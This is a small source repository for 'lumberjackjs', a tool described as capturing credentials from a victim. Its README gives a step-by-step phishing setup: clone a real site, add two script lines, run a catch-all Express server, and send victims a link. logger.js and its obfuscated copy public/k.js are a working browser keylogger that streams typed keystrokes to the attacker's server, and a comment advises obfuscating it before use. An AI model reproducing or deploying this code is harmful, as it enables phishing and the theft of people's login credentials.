├── .gitignore ├── README.md ├── app.js ├── license.txt ├── logger.js ├── package.json └── public └── k.js /.gitignore: -------------------------------------------------------------------------------- 1 | index.html 2 | node_modules 3 | *.swp 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | lumberjackjs 2 | ============ 3 | 4 | Express and socket.io to capture and send credentials from a victim. Uses client side Javascript to capture keys for seamless site cloning. Simply clone a site, add 2 lines of html, and you're good to go. Send any link to your victim as the server uses a catch all url '*'. No need to setup a full mirror and duplicate directory structure. 5 | 6 | #### Quick Start 7 | 8 | 1. Clone repo and install modules 9 | 10 | git clone https://github.com/tomsteele/lumberjackjs.git 11 | cd lumberjackjs 12 | npm install 13 | 14 | 2. Clone a site and mv to index.html 15 | 16 | wget -mk 17 | mv .html index.html 18 | 19 | 3. Add two lines to index.html 20 | 21 | 22 | 23 | 24 | 4. Start server 25 | 26 | sudo node app 27 | 28 | 5. Send a link to your victim and capture credentials 29 | 30 | -------------------------------------------------------------------------------- /app.js: -------------------------------------------------------------------------------- 1 | // Copyright (c) 2013 Tom Steele 2 | // See the file license.txt for copying permission 3 | var express = require('express'); 4 | var app = express(); 5 | var server = require('http').createServer(app); 6 | var io = require('socket.io').listen(server, {log: false}); 7 | 8 | app.configure(function() { 9 | app.use(express.logger()); 10 | app.use(express.static(__dirname + '/public')); 11 | }); 12 | 13 | app.get('*', function(req, res) { 14 | res.sendfile(__dirname + '/index.html'); 15 | }); 16 | 17 | server.listen(80); 18 | io.sockets.on('connection', sockOps); 19 | function sockOps(socket) { 20 | socket.on('data', function(data) { 21 | console.log('Captured string: ' + data.data); 22 | }); 23 | } 24 | -------------------------------------------------------------------------------- /license.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) 2013 Tom Steele 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy 4 | of this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights 6 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 7 | copies of the Software, and to permit persons to whom the Software is 8 | furnished to do so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in 11 | all copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 19 | THE SOFTWARE. 20 | -------------------------------------------------------------------------------- /logger.js: -------------------------------------------------------------------------------- 1 | // Copyright (c) 2013 Tom Steele 2 | // See the file license.txt for copying permission 3 | // 4 | // run uglify-js or some other obfuscator before using 5 | // 6 | (function() { 7 | var socket = io.connect('http://' + window.location.host); 8 | var capture = ''; 9 | document.onkeypress = keypress; 10 | document.onkeydown = keydown; 11 | document.onclick = onclick; 12 | 13 | function onclick() { 14 | socket.emit('data', {data: capture}); 15 | } 16 | 17 | function keydown(evt) { 18 | if (evt.which === 9) { 19 | capture += '::'; 20 | } 21 | } 22 | 23 | function keypress(evt) { 24 | if (evt.which === 13) { 25 | socket.emit('data', {data: capture}); 26 | capture = ''; 27 | } 28 | else { 29 | capture += String.fromCharCode(evt.which); 30 | } 31 | } 32 | })(); 33 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "lumberjackjs", 3 | "version": "0.0.0", 4 | "description": "Simple credential harvesting with socket.io and express", 5 | "main": "app.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "repository": { 10 | "type": "git", 11 | "url": "https://github.com/tomsteele/lumberjackjs.git" 12 | }, 13 | "author": "Tom Steele", 14 | "license": "MIT", 15 | "readmeFilename": "README.md", 16 | "gitHead": "3e2552fa2b9178b72b42f46597e00e08dfe03824", 17 | "dependencies": { 18 | "socket.io": "~0.9.14", 19 | "express": "~3.2.2" 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /public/k.js: -------------------------------------------------------------------------------- 1 | (function(){var n=io.connect("http://"+window.location.host);var o="";document.onkeypress=c;document.onkeydown=i;document.onclick=t;function t(){n.emit("data",{data:o})}function i(n){if(n.which===9){o+="::"}}function c(t){if(t.which===13){n.emit("data",{data:o});o=""}else{o+=String.fromCharCode(t.which)}}})(); --------------------------------------------------------------------------------